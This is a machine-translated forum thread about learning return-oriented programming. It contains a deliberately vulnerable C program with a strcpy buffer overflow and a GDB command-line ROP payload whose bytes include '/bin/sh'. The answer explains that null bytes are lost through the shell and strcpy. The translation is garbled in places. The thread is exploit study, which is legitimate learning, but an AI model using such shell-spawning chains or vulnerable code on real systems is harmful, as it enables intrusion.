Buffer overflow, ROP, the addresses of the gadget are recorded in memory without "x00."



  • I'm trying to understand Return oriented programming, I've done everything in this game. http://habrahabr.ru/post/255519/ ♪ But he faced a problem:

    I rescheduled. %RIP and recorded the addresses of the gadget after him, but instead of, for example, two addresses. 0x00007ffff7a58b7d and 0x00007ffff7b2bcd2I rewrite my memory after RIP, there's a record of these addresses. 0x7ffff7a58b7d7fffand 0x7ffff7b2bcd2(первые четыре символа из следующего адреса)♪ So zeros went missing at the beginning, and the addresses went down to the number of these zeros.

    What's my problem?

    Vulnerable program code:

    #include <string.h>
    #include <stdio.h>
    

    int foo(char *bar)
    {
    int loggedin = 0;
    char password[50];
    strcpy(password, bar);
    if(strcmp(password, "secur3")==0)
    {
    loggedin = 1;
    }
    return loggedin;
    }

    int main(int argc, char **argv)
    {
    if(foo(argv[1]))
    {
    printf("\n\nLoggedin\n\n");
    }
    else
    {
    printf("\n\nLogin Failed!\n\n");
    }
    return 0;
    }

    For correspondence RIP In my case, 72 bays are required.

    That's what I'm looking for at the GDB entrance:

    run $(python -c "print 'A'*72+'\x58\xd8\xa5\xf8\xff\7f\x00\x00'+
    '\x3b\x00\x00\x00\x00\x00\x00\x00\x00'+'\x7d\x8b\xa5\xf7\xff\x7f\x00\x00'+
    '\x00\x10\x60\x00\x00\x00\x00\x00'+'\xd2\xbc\xb2\xf7\xff\x7f\x00\x00'+
    '\x68\x73\x2f\x6e\x69\x62\x2f'+'\x43\x50\xab\xf7\xff\x7f\x00\x00'+
    '\xd4\xa5\xb4\xf7\xff\x7f\x00\x00'+'\x00\x00\x00\x00\x00\x00\x00\x00'+
    '\xe0\x1e\xad\xf7\xff\x7f\x00\x00'+'\x00\x00\x00\x00\x00\x00\x00\x00'+'\xd8\x12\xb1\xf7\xff\x7f\x00\x00'")



  • Here's the example in Habre that all the "grown" is done, where the program gets an injection. And you're trying to make it through the program.

    I've been doing a little experiment.

    python -c "print('A'*10+'\x00\x00BB')" >a
    

    In the file. a As expected, there was a line of ten 'A' two zeros and 'BBB'. After which I performed:

    echo $(python -c "print('A'*10+'\x00\x00BB')") >a
    

    That's all's changed on the team, I've got the piton out as a parameter to the team. echo The one who printed it, and he wrote it in the file. So there's no double zero in this case. Which confirmed my fear that shell did not, in principle, transfer two-way zeros through the command line.

    But if shell gave it to you without change, it would've been a little less helpful, because all the building functions C are working with lines that are two-way 0. I mean. strcpy Copying the line only to the first binary zero in this line... So come up with some other vulnerable code that will take data for overcrowding from any other source and will not use string functions to work with them. Or we'll be able to make a work line without zero, which I think is utopia.




Suggested Topics

  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2